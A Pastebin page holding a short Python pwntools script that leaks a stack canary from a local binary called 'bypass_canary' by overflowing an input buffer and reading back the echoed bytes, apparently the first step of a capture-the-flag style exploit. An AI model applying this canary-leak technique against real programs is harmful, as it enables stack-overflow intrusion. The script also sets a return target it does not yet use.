Advertisement
Guest User

Untitled

a guest
Oct 19th, 2019
91
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.27 KB | None | 0 0
  1. from pwn import *
  2.  
  3. r=process("./bypass_canary")
  4.  
  5. print r.recv()
  6. sys=0x40077e
  7. padding="a"*0x18
  8. payload=padding+"1"
  9. gdb.attach(r)
  10. r.sendline(payload)
  11.  
  12. result=r.recv()
  13. result=result.split("1")[1][:7]
  14.  
  15. canary="\x00"+result
  16. canary=u64(canary)
  17.  
  18. print hex(canary)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement